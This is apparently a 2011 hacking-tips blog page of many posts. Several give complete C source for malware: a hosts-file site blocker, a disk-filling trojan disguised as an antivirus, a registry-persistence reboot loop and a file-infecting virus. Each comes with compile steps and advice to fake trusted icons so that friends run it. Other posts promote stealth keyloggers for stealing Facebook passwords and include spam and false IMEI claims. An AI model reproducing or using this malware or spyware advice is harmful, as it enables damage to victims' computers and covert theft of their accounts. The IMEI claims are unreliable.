Wednesday, January 19, 2011

How to Trace Mobile Numbers

With the rapid growth of mobile phone usage in recent years, we have often observed that the mobile phone has become a part of many illegal and criminal activities. So in most cases, tracing the mobile number becomes a vital part of the investigation process. Also sometimes we just want to trace a mobile number for reasons like annoying prank calls, blackmails, unknown number in a missed call list or similar.
Even though it is not possible to trace the number back to the caller, it is possible to trace it to the location of the caller and also find the network operator. Just have a look at this page on tracing Indian mobile numbers from Wikipedia. Using the information provided on this page, it is possible to certainly trace any mobile number from India and find out the location (state/city) and network operator (mobile operator) of the caller. All you need for this is only the first 4-digit of the mobile number. In this Wiki page you will find all the mobile number series listed in a nice tabular column where they are categorized based on mobile operator and the zone (state/city). This Wiki page is updated regularly so as to provide up-to-date information on newly added mobile number series and operators. I have used this page many a time and have never been disappointed.
If you would like to use a simpler interface where in you can just enter the target mobile number and trace the desired details, you can try this link from Numbering Plans. Using this link, you can trace any number in the world.
By using the information in this article, you can only know “where” the call is from and not “who” the caller is. Only the mobile operator is able to tell you ”who” the caller is. So if you’re in an emergency and need to find out the actual person behind the call, I would recommend that you file a complaint and take the help of police. I hope this information has helped you!

Is your Nokia Cell Phone Original


Nokia is one of the largest selling phones across the globe. Most of us own a Nokia phone but are unaware of it’s originality. Are you keen to know whether your Nokia mobile phone is original or not? Then you are in the right place and this information is specially meant for you. Your phones IMEI (International Mobile Equipment Identity) number confirms your phone’s originality.
Press the following on your mobile *#06# to see your Phone’s IMEI number(serial number).
Then check the 7th and 8th numbers
Phone serial no. x x x x x x ? ? x x x x x x x

IF the Seventh & Eighth digits of your cell phone are 02 or 20 this means your cell phone was assembled in Emirates which is very Bad quality
IF the Seventh & Eighth digits of your cell phone are 08 or 80 this means your cell phone was manufactured in Germany which is fair quality
IF the Seventh & Eighth digits of your cell phone are 01 or 10 this means your cell phone was manufactured in Finland which is very Good
IF the Seventh & Eighth digits of your cell phone are 00 this means your cell phone was manufactured in original factory which is the best Mobile Quality
IF the Seventh & Eighth digits of your cell phone are 13 this means your cell phone was assembled in Azerbaijan which is very Bad quality and also dangerous for your health.

How to Hack Windows Administrator Password

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.
  • You do not need to know the old password to set a new one
  • Will detect and offer to unlock locked or disabled out user accounts!
  • There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below
Offline NT Password & Reg Editor Download
It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.
1. Open the command prompt (Start->Run->type cmd->Enter)
2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

A Virus Program to Block Websites

Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
Here is the sourcecode of the virus.
#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
How to Compile ?
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1                                google.com
5. Delete all such entries which contain the names of blocked sites.
NOTE: You can also change the ICON of the virus to make it look like a legitimate program.This method is described in the post: How to Change the ICON of an EXE file ?

A Virus Program to Disable USB Ports

In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).
I hope you like this post. Please pass your comments.

How to Make a Trojan Horse

How to Make a Trojan
Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…
Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.
 
Now lets move to the working of our Trojan
The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
 
The algorithm of the Trojan is as follows
1. Search for the root drive
2. Navigate to WindowsSystem32 on the root drive
3. Create the file named “spceshot.dll
4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full
5. Once the drive is full, stop the process.
You can download the Trojan source code HERE. Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable.
 

How to compile, test and remove the damage?

 
Compilation:
For step-by-step compilation guide, refer my post How to compile C Programs.
Testing:
To test the Trojan,  just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.
NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
 
How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
%systemroot%\system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.
 NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?
Please pass your comments and tell me your opinion. I am just waiting for your comments

A Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.
Here is the source code.
#include<stdio.h>
#include<dos.h>
#include<dir.h> int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart
}
NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.
 
Compiling The Scource Code Into Executable Virus.
 
1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, refer my post How to compile C Programs.
 
Testing And Removing The Virus From Your PC
 
You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.
 
1. Reboot your computer in the SAFE MODE
2. Goto
X:\Windows\System
(X can be C,D,E or F) 3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

 There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
 
Logic Behind The Working Of The Virus
 
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.
 
LOGIC:
 
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) into X:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exe file.The restarting process will occur from the next boot of the system.
 
AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)
 
After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.
The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
 
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h> FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
 

COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

Speed Up PC – How to Boost your PC Speed

5 Ways to Speed Up PC

Speed Up PC
Are you fed up with your slow PC? Well you can Speed Up your PC by 3 times. In this post you’ll find some of the most significant ways to speed up your PC. For your convenience, I ’ll split this post into 2 parts.
1. Automatic Ways to Speed Up PC (Using PC Speed Up Softwares)
2. Manual Ways to Speed Up PC
 

Automatic Ways to Speed Up PC

 
You can use a PC Optimizer Tool to automatically boost the Speed of your PC without the need to worry about the manual ways of doing it. These tools will automatically find and fix upto 99% of your PC errors by optimizing the Windows registry, cleaning up junk files, removing unwanted items from the start up etc. This can speed up your PC and Internet speed by upto 3 times. Here are some of the best PC Optimizer Programs that I recommend.
1. Perfect Optimizer
2. Registry Easy
Using a PC Optimizer is the easiest way to speed up your PC. This is because, most of the performance tweaks such as Registry Cleanup cannot be done manually.
 

Manual Ways to Speed Up Your PC

 
1. Free Up Disk Space to increase the speed of your PC
  • Remove temporary Internet files.
  • Empty the Recycle Bin.
  • Remove Windows temporary files.
  • Uninstall Programs that you no longer use.
2. Periodically Perform Hard Disk Defragment. This can Speed Up your PC significantly.
3. Clean Up your Registry (Highly Recommended)
Cleaning Up your Windows Registry is very much necessary to speed up your PC. Unfortunately you cannot do this manually. You have to use a Registry Cleaner to do this. Here is the best registry cleaner on the web.
A complete review of registry cleaners can be found at Registry Cleaner Comparison
4. Clean Up the browser cache to Speed Up your Internet.
Spywares can really hurt the performance of your PC. So, install a good anti-spyware to protect your PC from spywares and improve the speed of your PC. I recommend the following Antispywares to protect your PC.
 

Which is the Best Way to Speed Up my PC? (Auto or Manual)

 
The best way to speed Up your PC is by using a PC Optimizer such as Perfect Optimizer or Registry Easy. This is because, manual ways can only perform 30-40% of the tweaks to improve the speed of your PC, but the most important aspect of the Speed Up process such as Registry clean Up and other advanced performance tweaks can only be done using a PC Optimizer software. So if you are serious about improving the speed of your PC, then you need to use a PC Optimizer.

How to Hack Windows Administrator Password

This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.
  • You do not need to know the old password to set a new one
  • Will detect and offer to unlock locked or disabled out user accounts!
  • There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.
 

How it works?

 
Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below
Offline NT Password & Reg Editor Download
It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.
 

Another simple way to reset non-administrator account passwords

 
Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.
1. Open the command prompt (Start->Run->type cmd->Enter)
2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

How to Recover Deleted Files

Have you accidentally deleted your files from the Hard disk? Do you desperately want to recover them back? Well you need not panic! It is possible to recover the deleted files back from the hard disk  (even after you have Shift+Deleted)  provided you act as soon as you realize that the files are deleted and use the best deleted files recovery software. In this post you will find a detailed information on how to recover the deleted files from your Windows PC or Mac.
Today there exists hundreds of data recovery tools and softwares on the market which boast to recover 100% of all the deleted files back in the original condition. But in reality most of these softwares are neither effective nor capable of recovering your files back. So it is very much necessary to make the right choice of the file recovery software in order to recover deleted files back in the original condition. We recommend the following softwares to recover the deleted files:
 
1. Stellar Phoenix Data Recovery (for Windows)
2. Stellar Phoenix Mac Data Recovery (for Mac)
 
Stellar Phoenix is one of the best company specializing in deleted files recovery services and solutions since 1993. Stellar’s Data Recovery Solutions encompasses a wide range of software for almost any data loss situation ranging from accidental formats to virus attacks to software malfunctions. Hence Stellar provides the best tools to recover deleted files with over 1,000,000 satisfied customers across 137 countries.
 

How the File Deletion Process Works?

 
When you delete a file from your computer (or even from the recycle bin) the file is not actually deleted. Unlike what most people think, the file is not permanantly deleted or dropped from your hard disk. Let’s take an example of a book containing 50 pages. Suppose when you delete the page 25, assume that only the entry in the index which points to the page 25 is deleted and not actually the page 25 itself. Likewise when you delete a file from your hard disk, only the pointer which points to this file is removed and not actually the file itself. This file still exists intact and is 100% possible to recover it back in the original condition. In this condition the file becomes invisible and hence appears to have deleted.
 

What are the Chances of Recovering my Files Back?

 
Since the operating system doesn’t immediately re-use the space from the deleted files, it is most certainly possible to recover the deleted files back in 100% original condition. It may take up a very long time for those files to be completely deleted since the modern hard disks have ample capacity. Hence the chances are too less that the space from the deleted files are re-used immediately. So, it is really worth to try out the file recovery softwares like Stellar Data Recovery for Windows or Stellar Data Recover for Mac. Some files are reported to have recovered even after years of it’s deletion. However for the best results, it is recommended that you use the file recovery software as immediately as possible to recover your files.
 

Recovering the Deleted Files

 
In order to recover the deleted files all you need to do is perform a scan (search) for the deleted files using a File Recovery Software. Please be informed that there is no manual way to recover the deleted files. The Phoenix Data Recovery software performs a thorough scanning of the hard disk sector by sector and will locate the existence of deleted files to restore them back in the original condition. It is the only software that supports 185 popular file types including Windows NT Registry, JPEG, MP4, GIF, BMP and MS Word files. The software offers rich graphical support and incorporates advanced scanning methods to completely scan and recover deleted files from your hard drive. With this you can
  • Recover FAT16, FAT32, VFAT, NTFS, and NTFS5 file system partitions
  • Recover deleted emails
  • Recover deleted documents
  • Recover deleted photos
  • Recover deleted music
  • Formatted Hard-Drive recovery
  • Recover files from USB Drives, CDs, DVDs and memory cards
  • Recover almost all the camera format files
Visit the following links for more information on Stellar Data Recovery
 
1. Stellar Phoenix Data Recovery (for Windows)
2. Stellar Phoenix Mac Data Recovery (for Mac)

Porn Blocker – Block Porn Completely

Porn Blocker to block Internet Porn. In fact, it is the responsibility of every parent to take every necessary step to prevent your child from being exposed to porn. In this post I will introduce you to an excellent porn blocker/porn filtering software using which you can block Internet porn and keep your computer Porn-Free. Here is the best Porn Blocker tool that I have ever used
 

My Porn Blocker – No1. Porn Filtering Software

 
 
My Porn Blocker main features
1. Block Porn Before it Appears – My Porn Blocker silently works in the background and stops harmful sites before they appear.
2. Integrates with all Search Engines – My Porn Blocker blocks links to porn sites from even appearing on search engines.
3. Works in Complete Stealth Mode – My Porn Blocker runs silently by hiding itself from the taskbar, process list, start menu and add/remove programs.
4. Blocks all Chat Softwares – Using My Porn Blocker it is possible to restrict your child from getting exposed to porn world via chatting.
5. Block/Limit Access to Social Networking sites - My Porn Blocker offers a feature by which you can block or limit access inappropriate services like MySpace and facebook.
6. Automatic Screenshot Capture - My Porn Blocker has the ability to take high quality screenshots which shows what your children do on the PC when you are away.
7. URL Logging- My Porn Blocker keeps neat and simple logs of every URL visited.
This is only a small list of it’s features. Visit My Porn Blocker Official Website for more information on this product.
 

Why My Porn Blocker is the Best?

 
The patented design of My Porn Blocker has a prominent advantage over the usual way most similar porn blocker software applications function. Most Porn Blockers fail to provide a complete solution to the problem caused by pornographic content. Hundreds to thousands of new porn websites are added to the Internet every minute and hence most porn blockers fail to filter the porn effectively.  However after testing a number of porn filter programs, I found out this excellent porn filter software called My Porn Blocker. It proves an easy but still a very effective tool to combat porn and keep your child away from pornographic content on the Web. It also contains many additional handy features which no other program on the Internet will offer. So we recommend this as the best porn filtering software on the Internet.
 
The Verdict – If you are really serious to keep your PC out of porn and are in search of the best porn filtering software then My Porn Blocker is the tool you should go for. So go grab My Porn Blocker now
 
Download My Porn Blocker Now!

Hack Facebook Password

Wondering to know how to hack Facebook password? Well before you try to hack any Facebook password, it is necessary to understand the real ways of hacking that actually work and also those that are simply scam and don’t work. Everyday I get a lot of emails where people ask me “how to hack Facebook password?” So in this post I have taken up this topic to show you the possible ways to do that!
Today even a noob computer user (perhaps like you) can easily hack Facebook or any other social networking site with ease in a matter of hours and thus hacking is no longer the secret art of a Russian hacker! Well the idea behind this post is to expose the truth behind hacking Facebook account so that you can stay away from all those scam sites which will rip off your pockets by making false promises to obtain any password for you. Also this post is not meant to encourage people into hacking Facebook, but rather it is meant to educate the Internet users to be aware of the common scams and frauds and stay away from them.
With my experience of over 7 years in the field of ethical hacking and security, all I can tell you is that there are only two ways to successfully hack a Facebook account.
 

1. Keylogging – Easiest Way to Hack Facebook Password

 
Keylogging refers to simply recording each and every keystroke that is  typed on a specific computer’s keyboard. This is possible with the use of a small computer program called keylogger (also known as spy software). Once installed, this program will  automatically load from the start-up, runs in invisible mode and start capturing each and every keystroke that was typed on the computer.  Some keyloggers with advanced features can also capture screenshots and monitor every activity on the computer. To install and use a keylogger one doesn’t need to have any special knowledge. That means anyone with a basic knowledge of computer can install and use this software with ease. Hence for a novice computer user this method is the easiest way to hack Facebook password. I recommend the following keylogger as the best for gaining access to facebook password.
 
Easily Access any Email
SniperSpy is a revolutionary product that will allow you to easily access *ANY* online account or password protected material such as MySpace, Facebook, Yahoo, Gmail etc. There are absolutely *NO* limitations to what accounts or websites this software can access!
 
 
Why SniperSpy is the best?
Today there exists hundreds of keyloggers on the market but most of them are no more than a crap. However there are only a few that stand out of the crowd and SniperSpy is the best among them. I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this you can install it on a remote computer without the need for having physical access to it. It operates in complete stealth mode so that it remains undetected.
 
Here is a summary of benefits that you will receive with Sniperspy software:
 
1. Access ANY Password
With SniperSpy you can hack any password and gain access to Facebook or any other online account.
 
2. Monitor Every Activity
You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.
 
3. Never Get Caught
SniperSpy operates in total stealth mode and thus remains undetectable. Thus you need not have the fear of being traced or get caught.
 
4. Remote Installation Feature
With Remote Install feature, it is possible to install it even on computers for which you do not have physical access. However it can also be installed on a local computer.
 
5. Extremely Easy to Use
Installing and using SniperSpy is simple and needs no extra skill to manage.
 
6. Completely Safe to Use
This software is 100% safe to use since it doesn’t collect any information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.
 
7. Works on both Windows and Mac
Fully compatible with Windows 2000/XP/Vista/7 and Mac.
 
So what are you waiting for? If you are really serious to hack Facebook password then SniperSpy is for you. Go grab it now and expose the truth!
 
 
 
 

2. Other Ways to Hack Facebook Password

 
The other common way to hack passwords or online accounts is Phishing. This is the most widely used technique by many hackers to gain access to Facebook and other social networking sites. This method will make use of a fake login page (often called as spoofeed webpage) which exactly resemble the original one. Say for example a spoofed webpage of Facebook looks exactly same as that of the original page. This page is actually created by the hacker and is hosted on his own server. Once an innocent victim enters his/her password in such a fake login page, the login details are stolen away by the hacker.
Most Internet users would easily fall prey to online phishing scams. Thus phishing scams trick users so that they themselves give away their passwords. However phishing requires specialized knowledge and high level skills to implement. Thus it would not be possible for a noob user to attempt this trick. It is punishable offense too. So I would recommend the use of keyloggers to hack Facebook since it is the easiest and safest way.

Monday, January 17, 2011

Find a Good Psd to Html Service

Anyone who's ever indulged in coding sites or hiring a website design company will generally attest to the fact that finding a good psd to html website design company is very important in determining the functionality of your website. There are quite a number of issue considered before one can convert psd to html, some of the key factors to consider is w3c standards which pretty much determine you site's accessibility online. Should you do bad coding which are not w3c standardized, your site may be visible on some internet browsers but be invisible on others. A website design company will certainly advice you on how to get the best Psd to Html website design Los Angeles.

Should you find yourself not able to align such factors, it is quite recommended that you seek professional advice from knowledgeable website design Los Angeles individuals. Should you be interested in a good psd to html service then you can consider utilizing service from a website design Los Angeles site. These site are known to be among the best site's available for any website design Los Angeles programming services good at converting psd to css, psd to xhtml and much more.

